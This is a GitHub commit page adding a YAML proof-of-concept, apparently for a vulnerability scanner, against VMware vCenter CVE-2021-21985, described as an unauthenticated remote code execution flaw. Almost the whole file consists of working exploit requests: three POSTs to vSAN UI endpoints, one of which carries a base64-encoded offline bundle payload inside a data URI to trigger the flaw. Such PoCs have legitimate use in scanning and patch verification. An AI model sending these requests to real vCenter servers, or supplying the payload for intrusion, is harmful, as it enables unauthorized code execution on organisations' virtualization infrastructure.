Skip to content

Commit 0c30975

Browse files
vvone123vvone123
authored
vmware-vcenter-cve-2021-21985-rce (#1310)
vmware-vcenter-cve-2021-21985-rce
1 parent 1ae049c commit 0c30975

File tree

1 file changed

+34
-0
lines changed

1 file changed

+34
-0
lines changed

pocs/vmware-vcenter-cve-2021-21985-rce.yml

Lines changed: 34 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,34 @@
1+
name: poc-yaml-vmware-vcenter-cve-2021-21985-rce
2+
rules:
3+
- method: POST
4+
path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
5+
headers:
6+
Content-Type: application/json
7+
body: |
8+
{"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a
9+
expression: |
10+
response.status == 200 && response.body.bcontains(b"{\"result\":{\"") && response.headers["set-Cookie"].contains("VSPHERE-UI-JSESSIONID")
11+
- method: POST
12+
path: /ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages
13+
headers:
14+
Content-Type: application/json
15+
body: |
16+
{"methodInput": [["https://localhost:443/vsanHealth/vum/driverOfflineBundle/data:text/html%3Bbase64,UEsDBBQAAAAIADihc1Okxc3arAEAAI8EAAASAAAAb2ZmbGluZV9idW5kbGUueG1spVNNT+MwFLxX4j+YIFWNRG0+biWJBOxlJVZC2z0gIQ6O+5qYdeysn9MUIf77unGBfoFUyCXOezMvM2M7yYFrJPNKaUyj0rl6xFjbthRrK3UxtbyC1ti/1NiCoSih4qyjRAc9Ep6OO5qjXOO35x3l7OTklN39uhl31KHU6LgWsMJGOQpzb4zgThqdvjb3ULMPlgXAsPugc5xEWfhhsqgQOUmjOo+IUBx9JI98xqniuqC31ghAvGqkmoB9JXVEYbwv2whn7JDbYqXlm0qiW6v42oyrBjKWS81yjmXCQmEnaig+bSeH99c/Lv9c3pO2NLyS5Czrn5KHh2wXK2EbahK2W3vSZbUVjMT1YKShP3XduLGzwKvfwPdJ5s3C0XOdU38wrBvEtAC3MnIQv2z72FN0brdEXzXTKViYfF2xxO8LE0YpWEA3Um2cVD6PhX96/Y7JPhiDT+ig2nFix6GxKrC2pgbrnoj21yON2pI7mPkESGcljY6eSRhHEdztEjzo/2uMuzCN8/sS1sckt1RJDei3bOlj8O6HPhqp/SVbMg964R3HMXmJ2GYqYYF+9R9QSwECFAAUAAAACAA4oXNTpMXN2qwBAACPBAAAEgAAAAAAAAAAAAAAtoEAAAAAb2ZmbGluZV9idW5kbGUueG1sUEsFBgAAAAABAAEAQAAAANwBAAAAAA==%23"]]}
17+
expression: |
18+
response.status == 200
19+
- method: POST
20+
path: /ui/h5-vsan/rest/proxy/service/systemProperties/getProperty
21+
headers:
22+
Content-Type: application/json
23+
body: |
24+
{"methodInput": ["output", null]}
25+
expression: |
26+
response.status == 200 && response.body.bcontains(b"{\"result\":") && !response.body.bcontains(b"null")
27+
28+
detail:
29+
vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"
30+
author: envone77
31+
description: "vmware vCenter unauth RCE cve-2021-21985"
32+
links:
33+
- https://www.anquanke.com/post/id/243098
34+
- https://github.com/alt3kx/CVE-2021-21985_PoC

0 commit comments

Comments
 (0)